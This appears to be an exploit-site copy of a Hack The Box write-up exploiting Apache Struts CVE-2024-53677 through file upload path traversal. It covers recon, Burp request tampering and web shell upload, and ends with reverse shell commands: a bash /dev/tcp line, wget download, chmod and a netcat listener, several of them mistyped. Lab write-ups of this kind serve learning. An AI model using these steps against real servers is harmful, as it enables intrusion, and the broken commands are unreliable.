Exploit for Unrestricted Upload of File with Dangerous Type in Apache Struts CVE-2024-53677

Name: Exploit for Unrestricted Upload of File with Dangerous Type in Apache Struts CVE-2024-53677
Rating: 5 (151 reviews)
2025-02-13 | CVSS 9.8
## https://sploitus.com/exploit?id=B2895D60-6C45-5425-B3E3-BBB88FD2D755
# CVE-2024-53677 Exploitation  
### Apache Struts RCE via File Upload  


## Description
CVE-2024-53677 is a vulnerability which impacts Apache Struts from 2.0.0 before 6.4.0. **⚠️ This was exploited in a Hack The Box lab.**

File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. 
🔗 **Reference:** [NIST NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2024-53677) 


## Reconnaissance 
### **Identifying an Attack Vector** 


1. The website has an **image upload** feature.
2. Uploaded files are stored at: ip/uploads/20250213_014317/starwars.png
3. On successful upload the sharable link of the image has the URL ip/s/04ab2f40
4. Finding the Apache Struts Version
  - An exposed `pom.xml` revealed **Apache Struts 6.3.0.1**
  - Confirmed vulnerable to **CVE-2024-53677**  

📸 **pom.xml exposure:**  



## Exploitation
### **Modifying File Upload Request**  
To exploit this vulnerability we utalise **BurpSuite** and its **Repeater** functionality to modify the packets before sending it. Below we have an unedited request.




Our issues are the site **blocks** file types which are not **[JPG, JPEG, PNG, GIF]** and anything in the /uploads directory is **Not Executable**. To get around these issues we will first add another paramenter.



The added parameter exploits OGNL (Object-Graph Navigation Language), which Apache Struts uses to process input data. The FileUploadInterceptor processes this parameter before handling the actual PNG image, allowing attackers to manipulate the request and potentially execute arbitrary code.

### **Finalising the Exploit**  
After adding the modified parameter, the server response confirms that the file was successfully uploaded. However, we notice that the file path differs from the usual upload directory.




#### **Attaching the Payload**  
Next, we embed the payload by appending it directly below the image data and right before our injected parameters. The shell payload can be sourced 🔗 **Reference:** [shell.jsp](https://raw.githubusercontent.com/TAM-K592/CVE-2024-53677-S2-067/refs/heads/ALOK/shell.jsp)
Additionally, one crucial detail is that the request requires "Upload" with a capital U instead of lowercase upload. This follows the exploit structure observed in: 🔗 **Reference:** [exploit.py](https://github.com/EQSTLab/CVE-2024-53677/blob/main/CVE-2024-53677.py)

With these modifications in place, we send the request. The server responds similarly, confirming a successful upload and reflecting the adjusted file path.
#### **Navigating the Exploit**  
Now, by navigating to the following URL, we can interact with our uploaded shell.
 ip/shelll.jsp?action=cmd&cmd=id 


At this stage, we can establish a reverse shell using a locally hosted web server. A simple way to achieve this is with Python:
python3 http.server -m 3004 

Next, create a basic shell script (e.g., shell.sh) 
cat bash -i >& /dev/tcp/$IP/$PORT 0>&1 > shell.sh

Use wget to download it
wget http://ip_address/filename -O /tmp

After downloading, provide execution permissions
chmod +777 /tmp/filename

and then use nc (netcat) to listen for the reverse shell.
nc -lvnp $PORT

Finally execute 
./filename